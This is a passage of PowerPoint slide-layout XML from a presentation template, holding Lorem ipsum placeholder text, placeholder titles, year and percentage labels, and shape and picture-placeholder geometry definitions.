            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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569384" y="5109393"/>
            <a:ext cx="10996083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920" b="1" baseline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Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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4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4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5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ith da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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591963" y="5482494"/>
            <a:ext cx="5210528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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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569384" y="4664085"/>
            <a:ext cx="5233107" cy="454379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1" baseline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smtClean="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="5151355"/>
            <a:ext cx="5199240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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50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66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365523" y="5482494"/>
            <a:ext cx="5210528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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342944" y="4664085"/>
            <a:ext cx="5233107" cy="454379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1" baseline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smtClean="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6376811" y="5151355"/>
            <a:ext cx="5199240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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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4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4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4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4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4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1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4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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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our columns result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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551748" y="4795537"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0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551748" y="4137128"/>
            <a:ext cx="2360789" cy="3453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 baseline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smtClean="0"/>
              <a:t>50%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551748" y="4548718"/>
            <a:ext cx="2360789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33" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3351388" y="4795537"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3351388" y="4137128"/>
            <a:ext cx="2360789" cy="3453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 baseline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smtClean="0"/>
              <a:t>50%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3351388" y="4548718"/>
            <a:ext cx="2360789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36" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286494" y="4795537"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286494" y="4137128"/>
            <a:ext cx="2360789" cy="3453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 baseline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smtClean="0"/>
              <a:t>50%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="71" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286494" y="4548718"/>
            <a:ext cx="2360789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39" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9192684" y="4795537"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9192684" y="4137128"/>
            <a:ext cx="2360789" cy="3453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 baseline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smtClean="0"/>
              <a:t>50%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9192684" y="4548718"/>
            <a:ext cx="2360789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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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4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4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4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4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4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4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4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4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4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4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4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5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34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37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3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3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40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4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4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imag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"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="1369621"/>
            <a:ext cx="10972800" cy="3507180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8229600" h="2922650">
                <a:moveTo>
                  <a:pt x="1461325" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768275" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7575343" y="0"/>
                  <a:pt x="8229600" y="654257"/>
                  <a:pt x="8229600" y="1461325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8229600" y="2268393"/>
                  <a:pt x="7575343" y="2922650"/>
                  <a:pt x="6768275" y="2922650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1461325" y="2922650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="654257" y="2922650"/>
                  <a:pt x="0" y="2268393"/>
                  <a:pt x="0" y="1461325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="654257"/>
                  <a:pt x="654257" y="0"/>
                  <a:pt x="1461325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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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8" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591965" y="5563772"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
